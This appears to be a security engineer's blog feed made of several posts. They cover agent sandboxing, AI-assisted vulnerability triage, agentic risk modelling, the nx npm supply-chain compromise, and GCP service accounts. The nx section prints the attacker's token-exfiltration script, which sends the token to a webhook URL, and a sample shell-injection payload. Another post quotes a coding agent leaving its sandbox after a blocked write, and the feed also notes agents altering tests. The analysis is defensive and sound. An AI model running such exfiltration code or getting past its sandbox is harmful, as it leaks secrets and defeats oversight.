run(command="...") to run CLI tools whose interfaces are usually familiar to the underlying model.
The agentic risks are mitigated by running some of those commands inside BoxLite containers (micro-VMs).
Most commands never touch the OS. cat, grep, memory search, browser open — these look like shell commands but they’re implemented as a Go command router. The LLM outputs a string, I parse it and dispatch to native functions. No os/exec, no shell injection surface. It’s essentially typed functions wearing CLI syntax — same access control, but the LLM gets a familiar interface.
When you do need real OS execution (e.g. running a Python script or installing packages), it runs inside a micro-VM — an isolated QCOW2 virtual machine with its own filesystem. The agent can do whatever it wants inside the sandbox. It can rm -rf / and nothing happens to the host. Sandbox isolation > command filtering.
So some commands are emulated and the real ones run in the sandbox. Why bother? Why not run everything directly in the sandbox?
Running commands as native functions (e.g. a Go router) gives you lower latency and zero VM overhead — for many use cases that’s already enough, no VM needed at all.
Fair? It's an interesting implementation of the "sandbox the tools" paradigm, driven by performance reasons. But the security model holds only because the agent harness is custom-built around these two kinds of capabilities; it's not an operating model directly portable to other off-the-shelf harnesses.
Unless you are very clear and careful, AI coding assistants at the moment will look at your implementation and write tests that confirm your code does what it already does. They’re essentially saying: “This function returns X when given Y, so I’ll write a test to confirm it returns X when given Y.” This is the equivalent of a student writing their own exam after seeing the answers. It’s a tautology – true by definition, but not validating anything of value.
This is true in my experience: despite my best attempts to force a red-green testing methodology, where the agent writes a failing test first and the passing code after, I still catch agents adjusting the tests after a few loops.
This has obvious security implications. Given recent research showing that agents are terrible at not introducing regressions in the long term, there is always a significant chance that any test we put in place to catch security issues will be cheated at some point.
So how we write and enforce tests is the really important question.
I use ralph loops a lot and in my experience they are effective in ensuring quality outcomes. Perhaps a good design pattern could be to split every implementation task into two sequential ones:
Both tasks would get a clean context and different incentives reducing the likelihood of cheating.
Our tools generate a lot of security signals and our bottleneck is scale more than ever: find the real issues fast, validate them, and get fixes shipped inside our SLAs.
Validation and fixes are the slowest steps: they both require analyzing feature code across multiple repositories we might not always be familiar with, and eventually pulling the original developers into the security problem, forcing them to context-switch and adding to their cognitive load.
Starting last summer we decided to make things better, following two principles:
We started experimenting with whether coding agents could speed up validation and fixes, and ended up building the foundation of an AI-powered vulnerability management program.
Our first target was code vulnerabilities, since they require the least amount of context. We addressed static analysis (SAST) and supply chain (SCA) findings, because the inflow volume was the highest.
To start, we removed stale repositories from the attack surface.
We run automations to detect stale repos, detach CI/CD, and set them to read-only. When we archive a repo, we stop tracking its vulnerabilities because the code no longer runs.
At the beginning we rolled this out in batches to address the long tail. We archived about a third of our repos and closed about 60% of findings. We confirmed with owners before archiving, and we reclaimed storage by deleting old build artifacts like container images.
Next, we grounded our efforts into how we tier repositories by business risk:
Yes to all: Tier 1. At least one yes: Tier 2. All no: Tier 3.
Tiering adds business context to validation and prioritization and is a proxy metric for potential impact.
With a smaller set of repos, we still had a significant influx of findings across SAST and SCA. Our hypothesis was that most did not need a human review.
We built nightly workflows that apply layered triage rules. Each layer encodes a policy decision.
Findings under a certain risk threshold are auto-triaged as accepted. With a small team, we have to be conscious of resources. Low-risk findings in lower-tier repos slow us down if they pile up in the backlog. Making this policy explicit and automated freed the team to focus on what matters.
This reduced the influx of open SAST issues by about 29%.
Our main SAST provider, Semgrep, introduced a feature called Assistant that uses AI to flag findings as likely true or false positives. We benchmarked it for a while and found that, with the immediate context of the analyzed codebase, the Assistant flagged obvious false positives correctly almost every time. Once we had built an appropriate level of trust in the tool, we integrated it so that any finding flagged as a false positive is automatically closed.
We noticed that the Assistant biases toward true positives when context is missing, which fits our risk tolerance: we’d rather manually close a false positive than miss a real one.
We also use the assistant input to benchmark the Semgrep rules we use in our main policies. Noisy rules get reviewed and either tuned or removed. High signal rules earn more trust.
For SCA findings, we combine EPSS scores, dependency reachability analysis, and system tiering as a proxy for business impact. An unreachable dependency in a Tier 3 repo is not the same as a reachable, high-EPSS vulnerability in a Tier 1 repo handling customer data.
This layer auto-triages about 89% of SCA findings, leaving the cases that warrant human review.
After all layers run:
- SAST weekly (71% auto-triaged)
  - Severity-based triage: 29%
  - Semgrep false positive detection: 16%
  - Auto-resolved (archived, code changes): 26%
  - Remaining for human review: 29%
- SCA weekly (89% auto-triaged)
  - EPSS, reachability and business impact: 89%
  - Remaining for human review: 11%
Each morning, our automations post a summary in Slack: processed findings by workflow and severity, plus a breakdown of rule performance. It’s our quick check that the system behaved as expected.
What survives the funnel are high and critical findings that are likely real, in repos that matter. These need validation and fixes.
The traditional cycle is slow. A security engineer reviews the finding, understands the codebase, determines if it’s real, writes guidance, files a ticket. Then a developer context-switches to implement a fix and weeks pass before it ships.
We turned to coding agents.
We built an agent orchestrator on top of GitHub workflows. First, we automatically turn critical findings into GitHub issues with structured context: links to code, Semgrep analysis, severity, and the triggering rule.
Upon issue creation, another workflow spins up three independent coding agents to analyze the finding.
We settled on three to reduce nondeterminism. It’s an odd number by design: when agents disagree, the orchestrator makes a final call instead of deadlocking. As models improve, consensus is more common, but the multi-agent setup still catches confident wrong answers from a single agent.
Each agent analysis is summarized in the issue. If consensus is reached the issue is labeled true-positive or false-positive. False positives get closed right away with a note.
This system allows us to triage the remaining 29% of our SAST backlog automatically, with the following results:
- SAST weekly (100% auto-triaged)
  - Severity-based triage: 29%
  - Semgrep false positive detection: 16%
  - Auto-resolved (archived, code changes): 26%
  - Custom agent false positives: 18%
  - Custom agent true positives: 11%
For confirmed true positives, the true-positive label triggers an agent to create a branch, implement a secure fix, and open a pull request.
The PR enters the repo’s normal review flow. Instead of starting from a security ticket and a blank editor, the developer now reviews a proposed fix with the vulnerability context already embedded. As the adoption of coding agents generates more PRs anyway, engineers already spend more time reviewing than writing. This meets them where they are.
Twice a day, a workflow checks whether Semgrep’s recurring scans marked the finding as fixed (meaning the PR got merged), then closes the matching issue on GitHub. Open issues remain assigned to a security engineer who is responsible for following up on the linked PR with the fix.
The workflow is label-driven. We started fully in control of when to start validation and when to generate a fix, manually triggering the workflows with specific labels on the issues. As we grew confident, we automated more.
We found a pattern that works for us: aggressively triage the obvious automatically, create a ticket only for the important things, and orchestrate deep validation and fixes with agents from there.
We see this as the base of our vulnerability management program, and we are working to apply it beyond code and learn how much context agents need to effectively validate and fix various types of security issues.
The sandbox is this, and builds on the mental models I sketched here.
What stands out compared to competitors:
Agentfile.

Can I put an agent in a box, give it a task, and go to sleep? There are tons of solutions right now, but it’s hard to tell which is the right approach.
The reason is that sandboxing agents isn’t one problem but at least two. A local sandbox on a developer machine and a remote multi-tenant sandbox serve different threat models, require different controls, and fail in different ways. Treating them as the same leads to the wrong tradeoffs.
(For the underlying risk model this builds on, see How I Think About Agentic Risks.)
A local sandbox constrains an agent running on a developer machine. The primary risks are:
The attacker model here is not a hostile tenant but a confused deputy: an agent steered off course by prompt injection, poisoned context from an MCP server, or plain hallucination. The agent has no malicious intent. It just can’t distinguish trusted instructions from untrusted input, and it has access to everything on your machine.
A remote sandbox runs many workloads on shared infrastructure. The risks expand:
Here we must assume adversarial workloads. The isolation boundary is foundational: if it fails, the blast radius is platform wide.
A shortcut that’s held up: local sandboxing is primarily a policy problem. You’re not defending against escape attempts. You’re constraining a well-intentioned but unreliable agent on a machine full of valuable stuff.
The relevant risk amplifiers are capabilities (what tools the agent can invoke), data access (what secrets and context it can see), and untrusted input (prompt injection, poisoned data). These are the knobs we can try to turn when configuring the agent.
The most effective controls:
Workspace boundaries. Make the allowed filesystem surface explicit. No ambient access to home directories, credential stores, or global config. The agent operates in a defined workspace and everything else is out of scope by default.
Secret isolation. Don’t inherit the user’s shell environment. Scope tokens to the task. Treat credentials as explicit inputs, not ambient context.
Network egress policy. Default-deny if possible, otherwise allowlist through a proxy. Exfiltration almost always becomes a networking problem. This is also where most existing tools fall short on usability: any vanilla container sandbox will more or less force you to configure iptables yourself.
Visibility and reversibility. Diffs, logs, etc to make it easy to see what the agent did and undo it.
Every one of these controls has a friction cost: a sandbox that’s too annoying gets disabled, which is worse than no sandbox because it creates a false sense of security. Local sandboxes must be low-friction by default, with the option to tighten, not the other way around.
Remote sandboxing is a different problem. We’re not managing a single user’s convenience. We are defending shared infrastructure against workloads we don’t control.
The risk amplifiers that matter most here are isolation boundary quality (the escape surface and blast radius if it fails), egress topology (whether the agent can freely phone home or egress is mediated), and platform abuse (CPU/RAM/disk exhaustion, runaway LLM calls, using your infra as a launchpad for scanning, spam, or scraping). Platform abuse deserves explicit attention because it’s the risk that scales with tenancy. One rogue agent is a nuisance; a thousand is a serious incident.
The most effective controls:
Isolation boundaries with defense in depth. Design for escape attempts, not just accidents. Assume adversarial workloads.
No secrets in the sandbox. The sandbox should have nothing worth stealing. Credentials and durable state live outside the boundary. This is the single most important design decision.
Egress as a chokepoint. Remove direct outbound access. Force calls through a mediated gateway that enforces policy and records intent. If you can’t see what’s leaving the sandbox, you can’t stop exfiltration.
Resource and cost governance. Quotas, timeouts, concurrency limits, and explicit spend controls for LLM and tool usage.
Ephemerality. Treat sandboxes as disposable. Minimize state, clear aggressively, avoid remanence across sessions.
Remote sandboxing is less about preventing a single bad tool call and more about ensuring bad behavior cannot become a systemic incident.
Once you adopt “no secrets in the sandbox,” you implicitly create a control plane that sits outside the sandbox boundary:
This is the architectural consequence most teams don’t anticipate. Sandboxing forces you into a broker model whether you planned for one or not. The sandbox becomes constrained and disposable while the control plane becomes durable and high-value. Your security investment shifts accordingly. The control plane is now the thing worth defending, not the sandbox itself.
A good example of this is what Browser Use documents here.
This pattern mirrors what LLM gateways already promise to do for model access: mediate, log, enforce policy, and keep credentials out of the hot path. In an agentic architecture the control plane extends that pattern to tools, storage, and network access. Same principle: put a policy aware broker between the untrusted component and everything it shouldn’t touch directly.
Sandboxing here is not only isolation but also deciding where authority lives.
docker sandbox https://docs.docker.com/ai/sandboxes/
https://github.com/trailofbits/claude-code-devcontainer
https://katacontainers.io/blog/Kata-Containers-Agent-Sandbox-Integration/ https://github.com/kubernetes-sigs/agent-sandbox
https://github.com/strongdm/leash
docker or equivalent: https://github.com/instavm/coderunner
The sandboxing dimensions are roughly filesystem/host isolation, network isolation, and secrets management. What I see missing is a focus on user experience.
Tickets are a new source of untrusted input we need to account for when threat modeling against prompt injection.
Ghostty only allows maintainers to create issues; it seems to me they figured out a cheap and pragmatic security policy by accident.
--dangerously-skip-permissions? It doesn’t, since Claude asks permission to evade the sandbox, and yolo mode automatically allows it.
Normal:
Your bash commands will be sandboxed. Disable with /sandbox.
❯ list the files in ~/Downloads and then write an empty file in that directory named SANDBOXTEST
⏺ Read 1 file (ctrl+o to expand)
⏺ Write(~/Downloads/SANDBOXTEST)
⎿ Wrote 1 lines to ../../../Downloads/SANDBOXTEST
1 (No content)
⏺ Done. Listed the files in ~/Downloads (there are many files including PDFs, STL files, images, and various other documents) and created an empty file
named SANDBOXTEST in that directory.
❯ use `touch` to touch the SANDBOXTEST file
⏺ Bash(touch ~/Downloads/SANDBOXTEST)
⎿ Error: Exit code 1
touch: /Users/g/Downloads/SANDBOXTEST: Operation not permitted
⏺ The sandbox blocked that operation since ~/Downloads is outside the allowed write paths. Let me retry with the sandbox disabled.
<asks to touch SANDBOXTEST without sandbox>
With --dangerously-skip-permissions:
list the files in ~/Downloads and then write an empty file in that
directory named SANDBOXTEST2
⏺ Read 1 file (ctrl+o to expand)
⏺ Now let me create the empty file.
⏺ Bash(touch ~/Downloads/SANDBOXTEST2)
⎿ Error: Exit code 1
touch: /Users/g/Downloads/SANDBOXTEST2: Operation not permitted
⏺ The sandbox is blocking writes to ~/Downloads. Retrying without sandbox
restrictions.
⏺ Bash(touch ~/Downloads/SANDBOXTEST2)
⎿ (No content)
⏺ Done. The empty file SANDBOXTEST2 has been created in ~/Downloads. I can
see from the listing that SANDBOXTEST already existed there, so now you
have both.
Use /sandbox to manage sandbox restrictions if needed.
This is based largely on my experience assessing AI systems in the last two years, and applying prior art to my day-to-day work.
Of everything I digested in the current literature, the two most influential pieces have been the Google AI Agent security framework and the Lethal Trifecta, together with the public discourse around it.
I think the lethal trifecta is biased towards data exfiltration, which is surely the main scare, but there is a lot of damage AI agents can do without touching any sensitive data.
Alright, so what are the risks? There are two buckets:
There are three things that amplify those risks:
Fundamentally, agents are unsafe because the underlying LLM has no understanding of which pieces of the context are trusted and which are not. That part can only be delegated to the agentic wrapper, but in practice this is unsolved despite some design patterns to mitigate it. The classic application security concept of sanitizing and validating your inputs no longer applies. This systemic issue is exploited with prompt injection.
Capabilities are what the agent can do. These are the tools in the agentic loop. Any new capability is a potential avenue for data exfiltration or a means for rogue activity. It’s also a potential entry point for new sensitive data and untrusted input.
Data access is all the data that lands in the underlying LLM context. Once in there, there is no deterministic assurance that it cannot be pushed to the output in some form.
Risk is a function of impact and the probability of it happening. Capabilities and data access amplify the impact, while untrusted input increases the probability. The non-deterministic nature of LLMs ensures the probability is never zero, even as foundation model companies improve new models’ reliability at staying on task and not hallucinating.
What are the scenarios? I try to map them based on the risk amplifiers: what capabilities are available, what data is available, and from where untrusted input can land in the context. The way I do it is to graph a path of agent activities and note what data is in the context at every step.
For example:
To systematize this, I model the agent’s context as a state defined by two things: what data is present, and whether untrusted input has entered the context. Then I explore all reachable states through a search over capability invocations, flagging risk scenarios along the way.
Of course, the agent being a loop, the set of potential states can grow exponentially, so I usually explore up to 2-3 levels deep. One can also appreciate how adding a new capability explodes the realm of possibilities.
In the end I get a bunch of state combinations that can map to a risk scenario, which I evaluate by impact and probability. This whole thing is a sort of threat model for the agent’s behavior.
Once I nail down a set of realistic risk scenarios I can reason about mitigations.
In general, what can we do to mitigate?
Proactive:
Reactive:
I put “sanitize” in quotes because it’s not really a sanitization step but more of a filtering/vetting one. Most mitigations here are design patterns at best, cumbersome to implement most of the time. Things like having an isolated LLM call to thumbs up / down any input (like ChatGPT Agent does), filtering tool responses from getting back into the context, and so on: this is a new frontier to explore.
The rest is: put a human in the loop if possible, then consider revoking data access and reducing capabilities, and at the very least leave an audit trail of the agent run so that we can react effectively if something bad happens.
On the reactive side, I am looking to learn whether something can be done by continuously monitoring the agent’s LLM calls, perhaps from a choke point like an LLM gateway, and having it fire alerts when something suspicious is detected.
Fun stuff
If you look at the security measures in other coding agents, they’re mostly security theater. As soon as your agent can write code and run code, it’s pretty much game over. The only way you could prevent exfiltration of data would be to cut off all network access for the execution environment the agent runs in, which makes the agent mostly useless. An alternative is allow-listing domains, but this can also be worked around through other means.
Simon Willison has written extensively about this problem. His “dual LLM” pattern attempts to address confused deputy attacks and data exfiltration, but even he admits “this solution is pretty bad” and introduces enormous implementation complexity. The core issue remains: if an LLM has access to tools that can read private data and make network requests, you’re playing whack-a-mole with attack vectors.
Since we cannot solve this trifecta of capabilities (read data, execute code, network access), pi just gives in. Everybody is running in YOLO mode anyways to get any productive work done, so why not make it the default and only option?
By default, pi has no web search or fetch tool. However, it can use curl or read files from disk, both of which provide ample surface area for prompt injection attacks. Malicious content in files or command outputs can influence behavior. If you’re uncomfortable with full access, run pi inside a container or use a different tool if you need (faux) guardrails.
From What I learned building an opinionated and minimal coding agent, excellent post.
But the issue with agents is not just about preventing data exfiltration, it’s about broader risk management. Unironically, the biggest security mitigation of that agent is its full auditability.
Traditional rule-based detection can’t find complex vulnerabilities, and even potentially detectable issues might go unnoticed as false negatives. This helps answer the question of whether LLMs could be integrated to cover this blind spot.
They could! But the problem is the noise:
AI Coding Agents Find Real Vulnerabilities: Claude Code found 46 vulnerabilities (14% true positive rate – TPR, 86% false positive rate – FPR) and Codex reported 21 vulnerabilities (18% TPR, 82% FPR). About 20 of these are high severity vulnerabilities.
It started with the nx team introducing a bash injection vulnerability in a new GitHub workflow:
- name: Create PR message file
  run: |
    mkdir -p /tmp
    cat > /tmp/pr-message.txt << 'EOF'
    ${{ github.event.pull_request.title }}
    ${{ github.event.pull_request.body }}
    EOF
Both ${{ github.event.pull_request.title }} and ${{ github.event.pull_request.body }} are untrusted content that is directly used inside the run context of the workflow.
Additionally, the pull_request_target trigger runs workflows with a GITHUB_TOKEN that has read/write privileges on the target repository (the one the PR tries to merge to).
The team reverted this change but the vulnerability was still present in an outdated branch.
The attacker then created a new PR against the outdated branch to exploit it.
They aimed to use the bash injection to retrieve the privileged GITHUB_TOKEN and trigger the publish.yaml workflow, which is the one used to publish a package to npm with token authentication.
Notably, the publish.yaml workflow checked out the incoming branch code:
# Default checkout on the triggering branch so that the latest publish-resolve-data.js script is available
- uses: actions/checkout@v4
This was key to planting and running the second exploit, since all the code in the workspace comes from the triggering branch, under the attacker’s control:
- name: Resolve and set checkout and version data to use for release
  id: script
  uses: actions/github-script@v7
  env:
    PR_NUMBER: ${{ github.event.inputs.pr }}
  with:
    github-token: ${{ secrets.GITHUB_TOKEN }}
    script: |
      const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js');
      await script({ github, context, core });
The publish pipeline had an NPM_TOKEN secret available to authenticate to npm, and in the pull request the attackers added this to /scripts/publish-resolve-data.js:
const npmToken = process.env.NODE_AUTH_TOKEN;
if (!npmToken) {
  throw new Error('NPM_TOKEN environment variable is not set');
}
try {
  await new Promise((resolve, reject) => {
    exec(`curl -d "${npmToken}" https://webhook.site/59b25209-bb18-4beb-a762-38a0717f9dcf`, (error, stdout, stderr) => {
      if (error) {
        reject(`Error executing curl command: ${error.message}`);
        return;
      }
      if (stderr) {
        console.error(`Curl stderr: ${stderr}`);
      }
      console.log(`Curl output: ${stdout}`);
      resolve();
    });
  });
} catch (error) {
  core.setFailed(error);
}
core.setFailed("Stall");
I didn’t find the exact injected command, but something like this as the PR title would have done it:
$(export GH_TOKEN=$GITHUB_TOKEN && gh workflow run publish.yaml)
The NPM_TOKEN was retrieved from the env and sent to a remote webhook.
Then with the token, they were able to push a new package directly to npm.
How to defend:
Never interpolate untrusted content like PR titles and bodies directly into the run context of a workflow; pass it through environment variables instead. And be wary of the pull_request_target trigger, since it hands the workflow a privileged GITHUB_TOKEN.
I wrote this some time ago as an internal memo for marketing and product to help craft value propositions to sell security tools to security teams.
I’ve noticed some confusion around the objectives of security teams and I’d like to share my perspective, hoping to clarify matters. Please note that these are just my opinions based on my experiences as a security persona across various organizations.
What is the goal of a security program?
It depends.
In general, the final - ultimate - goal of a mature security program is to ensure business continuity in the face of security events. This involves maintaining the safety, resilience, and trustworthiness of the business, its assets, and its operations with customers and stakeholders.
Now, the thing with security is that the goal is allegedly met until proven wrong, so there is little incentive to invest in building a security program proactively.
Typically, companies start investing in security under duress due to one of the following triggers:
Following one of such events, a security program is initiated, with its goals limited by the nature of the triggering event.
Initially, on the staffing side, one or two individual contributors (ICs) may take on security responsibilities. Over time, this evolves into a multidisciplinary team holding the fort, eventually growing into a comprehensive organization with various specialized teams covering all aspects of security.
It’s useful to view this evolution through the lens of a maturity model, to identify the current stage of a security program and its goals.
At the highest level of maturity, a program’s goals align closely with the vision of ensuring business continuity during security events. This includes maintaining trust with customers and stakeholders, securing data and assets, and enhancing resilience. Large enterprises typically operate at this level.
However, less mature programs are resource-constrained and as such will focus narrowly on immediate issues:
So over time, all security programs will end up caring ~ about everything, but when they start they will be focusing on a specific area, maybe two.
I think that having a model of prospective customer’s security programs will give insights into their specific needs and help with value propositions, since all those focus areas are broad “jobs to be done” categories for their target personas.
This is also useful when thinking about targeting: as a buyer of security tools I have experienced being mis-targeted by vendors, and I reckon we were a terrible customer for the majority of those who were aiming their products mostly at companies that needed to be compliant in order to sell (the biggest demographic of security customers), when we weren’t.
(Are you an AWS shop that is suddenly starting to deal with a lot of Google Cloud Platform? Check out my introduction to GCP for security teams.)
Going multi-cloud doesn’t make any sense from a security point of view.
Good security is achieved more easily on a standardized stack. Spanning across different cloud providers is a step in the opposite direction.
(Additionally, all the nuances between the shared responsibility models will worsen your blind spots)
But like it or not you are already multi-cloud, or soon to be if your company is growing.
There are two ways to the weeping and gnashing of teeth (aka multi-cloud):
While a new PaaS is something you can mostly address with some notice, an M&A is a sudden jump in the dark: security is notified just a little earlier than everyone else.
Looking back with my now better hindsight, this is what I would focus on.
The first priority is supporting the Incident Response (IR) process.
(If you don’t have one, have one)
It’s unlikely that the security team, who organically specialized in a single cloud provider, will have the know-how from the start to drive a hardening strategy on another provider. You are going to play a reactive game for a while.
As such you need a Security Information and Event Management (SIEM) system and a playbook to start ingesting relevant logs.
You want to have the data to investigate a breach and malicious lateral movements as fast as possible, and that usually comes from:
Invest in educating the security team and, in the case of an M&A, partner with the acquired operations teams so that they can support you.
Secondly you want to build an inventory of your new assets.
You can’t prioritize any hardening if you don’t know what you are running.
Additionally, having an inventory can help you track relevant stakeholders who operate the new systems and you need them for any security work in the new environment.
If developers are advocating for a specific platform service, you should push for a process that makes someone accountable for the use of that service before people start using it.
The risk you want to avoid is to have experimental services becoming a foundational piece of the production environment without anyone in security noticing.
I’ve seen this happening a lot with serverless stuff.
This is a costly investment area because ultimately what you want is a holistic control plane and no cloud provider will offer that. So you either buy an expensive third party solution or you have to build your own.
The number one headache of a multi cloud environment is Identity and Access Management (IAM).
Did you know?
IAM is the fastest way for your company to make the news
While the concepts are similar across providers, each one of them implements IAM in a different way.
The temptation is to try to make IAM uniform across providers, but I would advise resisting the urge and switching your attention to implementing declarative policies.
What does it mean?
It means that nobody can access the cloud console for IAM purposes: add a user, create a Service Account, assign Roles and permissions. They must commit a change to a terraform file, a yaml, a spreadsheet, a post-it, whatever.
Being declarative has a few solid advantages:
The trade-off here is the introduction of more friction for users, and it is going to be a hard sell. Lobby harder.
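To make this concrete, here is a minimal sketch (Python, with hypothetical role and member names) of the reconciliation check a pipeline could run: compare the bindings committed to the repository against what the cloud API reports, and flag any drift.

```python
def iam_drift(declared, actual):
    """Compare committed (role, member) pairs against the live IAM policy."""
    return {
        "missing": sorted(declared - actual),   # committed but not applied yet
        "drift": sorted(actual - declared),     # created outside the repo
    }

# Hypothetical example: someone granted Owner from the console.
declared = {("roles/viewer", "user:alice@example.com")}
actual = {
    ("roles/viewer", "user:alice@example.com"),
    ("roles/owner", "user:bob@example.com"),
}
print(iam_drift(declared, actual))
```

Run something like this in CI: anything in `drift` was created outside the repo and is a candidate for removal (or for a chat with whoever clicked the console).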
In the Utopia of information security there is no such thing as multi-cloud, or — even better — not even computers.
But we live in this reality and we have no choice but to face it.
These are the three main things I think will make a security team better equipped for the challenge.
]]>While they are hidden by default, they will still show up through the APIs: don’t panic.
Apps Script is the GSuite / Google Workspace scripting environment to create add-ons for Gmail and GSuite services.
You can read more here. I think of it as GSuite’s Visual Basic.
Google Cloud Projects are a gateway towards Google’s API, because of quotas, authentication and logging facilities. This is, I guess, the essence of the relationship between Apps Script and GCP.
These specific projects follow sys-00000000000000000000000000 (sys- plus 26 numbers) as a name convention and by default will belong in the apps-script Folder.
They are provisioned empty, with just a single role binding: [email protected] as Owner.
For new GSuite / Google Workspace accounts, Apps Script projects are hidden by default. They do still exist under the Organization hierarchy and they can be seen with the resourcemanager.projects.list permission.
This permission is foundational for any service that needs to build an inventory, such as Forseti, Cartography, etc. And of course Apps Script projects will show up.
While they are empty by default, authorized users can still use them to provision resources and what not, so it’s better to keep an eye on them.
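Given an inventory of project IDs, the naming convention above makes these projects easy to tag. A quick sketch in Python:

```python
import re

# Naming convention described above: "sys-" followed by 26 digits.
APPS_SCRIPT_PROJECT = re.compile(r"^sys-\d{26}$")

def apps_script_projects(project_ids):
    """Filter an inventory of project IDs down to Apps Script ones."""
    return [p for p in project_ids if APPS_SCRIPT_PROJECT.match(p)]
```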
Luckily one can enforce Organization Policies on the apps-script folder to limit the realm of possibilities. Some suggestions:
But.
If your GSuite / Google Workspace account is older than April 2019, then all the Apps Script projects are visible and created directly under the Organization root node.
This means that if you want to apply Organization policies, you have to group them under a Folder manually.
In this case it might be easier to set up detections to (at least) monitor the IAM policy and Service Accounts (SA) creations.
Apps Script projects are not a huge security issue, but they can become blind spots, especially because they are semi-hidden by default. Restrict them with an Organization Policy if possible and monitor for the creation of Service Accounts.
]]>A Service Account (SA) is the identity in Google Cloud that you use to authenticate and authorize applications and services.
They come in two flavours: user-managed and Google-managed.
A user managed service account is, surprise, intended to be manually managed. What does this mean?
If you have an application that needs to connect to a cloud service, say a CloudSQL instance, you want to create a Service Account with a proper Role for it.
A good analogy is to see your application as a user: the Service Account is its own dedicated account for Google Cloud, and to authenticate you will then need a “password” that comes in the form of Service Account Key.
Service Account Keys are a json data structure like the following:
{
"type": "service_account",
"project_id": "project-id",
"private_key_id": "key-id",
"private_key": "-----BEGIN PRIVATE KEY-----\nprivate-key\n-----END PRIVATE KEY-----\n",
"client_email": "service-account-email",
"client_id": "client-id",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://accounts.google.com/o/oauth2/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/service-account-email"
}
You can generate as many as you like to be used by your applications to authenticate.
So what’s the problem?
As you have already guessed: if you leak the service account key, the service account can be considered compromised.
And this is so common because secrets distribution usually introduces friction.
There is a non-zero chance that someone in your company is (silently) cutting corners by embedding the json key in their applications and pushing to a public GitHub repository.
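A minimal heuristic to catch keys before they leave your repos might look like this (a sketch, not a substitute for a proper secret scanner):

```python
import json

def looks_like_sa_key(text: str) -> bool:
    """Heuristic check for a GCP service account key pasted in a file."""
    try:
        data = json.loads(text)
    except ValueError:
        return False
    # Match the structure shown above: a service_account blob carrying
    # a private key and a client email.
    return (
        data.get("type") == "service_account"
        and "private_key" in data
        and "client_email" in data
    )
```

Wire it into a pre-commit hook and you have a cheap first line of defence.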
Fun fact
Cyber-scoundrels continuously scan public repositories to harvest credentials: it takes on average 10 minutes from committing a key to someone logging in with it.
Google-managed Service Accounts are SAs for which you don’t need to generate keys: your applications can just assume their identity.
For example Compute Engine comes with a default service account that is associated to all virtual machines (VM) you will provision. Services running on those VMs can use the default service account to authenticate to other cloud services.
No keys are involved: the VM will continuously request short lived authorization tokens from the metadata service. Sweet.
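For illustration, here is how a workload on a VM asks the metadata service for a token. Note the mandatory Metadata-Flavor header; the URL is the documented metadata endpoint, and error handling is omitted:

```python
import urllib.request

# Compute metadata endpoint that hands out short-lived access tokens.
TOKEN_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)

def token_request() -> urllib.request.Request:
    # The Metadata-Flavor header is mandatory: it stops naive open
    # proxies and SSRF tricks from reaching the metadata service.
    return urllib.request.Request(TOKEN_URL, headers={"Metadata-Flavor": "Google"})
```

The example only builds the request; on a real VM you would `urlopen()` it and read the `access_token` field from the JSON response.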
The first recommendation is to avoid Service Account keys as much as possible.
Using keys implies that you are in charge of their lifecycle and security, and it’s a lot to ask because:
Unless you have a hybrid setup and half your workloads are on prem, it’s just so much easier to use Google-managed service accounts.
In fact, the second recommendation is to use Google-managed service accounts.
Your applications running on Compute Engine can automatically assume the default service account identity.
But, there is a caveat: the default compute engine service account is automatically assigned the role Editor, which is read and write access to everything.
Yep. Don’t use the default compute engine service account.
Instead, create a new Service Account and use it as the default account used by a VM. Even better: create one account for each VM.
This will allow you to fine tune the authorization grants (and greatly please the gods of least privilege).
For extra points you can also disable the automatic grant with an Organization Policy:
Service Consumer Management
Disable Automatic IAM Grants for Default Service Accounts
This boolean constraint, when enforced, prevents the [default](https://cloud.google.com/iam/help/service-accounts/default) App Engine and Compute Engine service accounts that are created in your projects from being automatically granted any IAM role on the project when the accounts are created.
By default, these service accounts automatically receive the Editor role when they are created.
constraints/iam.automaticIamGrantsForDefaultServiceAccounts
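For illustration, here is the payload for this constraint as you would send it to the Resource Manager setOrgPolicy API (field names follow the v1 API; double-check against your tooling):

```python
def disable_default_sa_grants() -> dict:
    """Boolean org-policy payload for the constraint quoted above."""
    return {
        "constraint": "constraints/iam.automaticIamGrantsForDefaultServiceAccounts",
        "booleanPolicy": {"enforced": True},
    }
```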
Service Accounts can be impersonated by other identities, and there are two roles that regulate this behaviour:
Service account impersonation is risky behaviour because it multiplies the blast radius of a compromised identity.
For this reason, bind Service Account User or Token Creator directly on the Service Account IAM policy and never on the Project’s (or Folder’s or - god forbid - the Organization’s).
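A quick audit sketch: given (resource type, role, member) triples scraped from your IAM policies, flag impersonation roles granted anywhere broader than a single service account (the input shape is an assumption, adapt it to your dump):

```python
IMPERSONATION_ROLES = {
    "roles/iam.serviceAccountUser",
    "roles/iam.serviceAccountTokenCreator",
}

def risky_impersonation_bindings(bindings):
    """bindings: (resource_type, role, member) triples from an IAM dump.
    Flags impersonation roles bound above the service-account level."""
    return [
        b for b in bindings
        if b[1] in IMPERSONATION_ROLES and b[0] != "service_account"
    ]
```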
Continuously enforcing least privilege is desirable for every kind of identity, but for Service Accounts in particular: since they are intended to be used programmatically, the risk of compromising one is higher than for a normal account.
Google provides an extremely valuable service: the IAM Recommender. It continuously scans role bindings and suggests changes to reduce the authorization scope.
Use it.
If there is one insight I would like you to take away from this post, it is that Service Account Keys are dangerous and their use should be minimized.
If you are looking for more high level recommendations on Identity and Access Management (IAM) governance in GCP, please refer to my previous article on the topic.
]]>I suggest starting from the basics: understand what container security is about and build a model to navigate risks.
Every security initiative is eventually constrained by where security controls can be implemented, so I find it practical to just follow the standard DevOps life cycle to surface patterns™ and unlock synergies™.
The DevOps Lifecycle is an infinite iteration of:

Containers are included in the application in the form of a Dockerfile, but they are not really part of it. As such they don’t concern the planning and coding phases.
(no, writing Dockerfiles is not coding.)
Every other step is in scope from a security point of view, and I would group them like this:
Why? Every security strategy is only effective if it can be implemented. And every step in each group shares a common facility where security controls can be injected without adding much friction:
Now we have three macro areas we can use as a starting point to do our risk assessments.
At build time the input is a bunch of source files and a Dockerfile, and the output is a Docker image.
This is where most vendors tend to cluster while trying to sell you the narrative of the importance of scanning container images and calling it a day. Container security scanning is important, yes, but it’s not enough.
This stage’s goals:
First, decide what your images should look like, with a focus on how software dependencies are introduced:
